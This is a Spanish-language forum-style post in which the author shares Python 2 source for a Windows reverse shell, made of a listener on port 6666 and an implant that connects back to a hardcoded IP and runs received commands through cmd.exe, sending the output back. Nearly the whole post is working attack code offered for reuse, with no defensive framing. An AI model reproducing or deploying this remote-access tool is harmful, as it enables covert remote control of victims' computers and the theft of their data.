Quiero compartir con todos vosotros una shell reverse que cree hace un año o así, la shell se puede completar, no le añadí para que pudiera cambiar de unidad de disco pero la comparto por si os puede servir.
cliente:
#By: HackLoper
from __future__ import print_function
import socket,time,os
integer = 0
RUTE = []
class command:
def conexion(self):
while True:
try:
self.s = socket.socket()
print("esperando...")
self.s.bind(("",6666))
self.s.listen(1)
print("[*]---HackLoper---[*]")
self.sc,self.addr = self.s.accept()
self.init()
except:
print('conexion perdida, reconectando...')
time.sleep(3)
continue
def init(self):
data = self.sc.recv(9999)
spl = data.splitlines()
os.system('cls')
for i in range(2):
print (spl[i])
print('\n')
data = self.sc.recv(9999)
if integer == 0:
RUTE.append(data)
i = 1
self.cmd()
def resp(self,data):
spl = data.splitlines();
n = len(spl)
n = n-1;
print('\n')
for i in range(1,n):
print(spl[i])
self.cmd()
def cmd(self):
print(RUTE[0]+'>',end ='')
comando = raw_input('')
if comando == 'cls':
self.sc.send('cls')
self.cmpi(comando)
else:
self.sc.send(comando)
data = self.sc.recv(9999)
self.cmpi(comando,data)
def cmpi(self,cmmd,data=None):
if cmmd == 'cd..' or cmmd[0:3] == 'cd ':
if os.path.exists(data) == True:
RUTE[0] = data
print('\n')
self.cmd();
else:
print (data);
print('\n')
self.cmd()
elif data == 'error':
error = self.sc.recv(9999);
print(error)
self.cmd()
elif cmmd == 'cls':
os.system('cls')
self.cmd()
else:
self.resp(data)
servidor:
#By: HackLoper
import socket,time,subprocess,re
RUTE = [None]
IP = "192.168.0.101"
PORT = 6666
class shell:
def conexion(self):
while True:
try:
self.s = socket.socket()
self.s.connect((IP,PORT))
shell.main()
except:
print('esperando...')
try:
client.close()
s.close()
except:
continue
continue
def main(self):
process = subprocess.Popen('cmd.exe',
shell=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
process.stdin.write("")
o,e=process.communicate()
process.wait()
process.stdin.close()
time.sleep(1)
self.s.send(o)
self.rute(o)
def rute(self,text):
t = re.search('[?: \\\s\w]+>',text)
repl = t.group(0).replace('>','')
RUTE[0] = repl
self.s.send(repl)
self.command()
def command(self):
cmd = self.s.recv(9999)
if cmd == 'cls':
self.command()
process = subprocess.Popen('cmd.exe /k',
cwd = RUTE[0].decode(),
shell = True,
stdin = subprocess.PIPE,
stdout = subprocess.PIPE,
stderr = subprocess.PIPE)
process.stdin.write(cmd+'\n')
o,e=process.communicate()
process.wait()
if e == '':
process.stdin.close()
self.correct(o,cmd)
else:
process.stdin.close()
if cmd == 'cd..' or cmd[0:3] == 'cd ':
self.s.send(e)
print(e)
self.command()
else:
self.s.send('error')
self.s.send(e)
self.command()
def cmpi(self,t):
dec = t.decode()
move = dec.replace('>','')
RUTE[0] = move
self.s.send(move)
self.command()
def correct(self,o,cmd):
if cmd == 'cd..' or cmd[0:3] == 'cd ':
split = o.splitlines()
cont = len(split)-1
data = split[cont]
self.cmpi(data)
else:
self.s.send(o)
self.command()
if __name__ == '__main__':
shell = shell()
shell.conexion()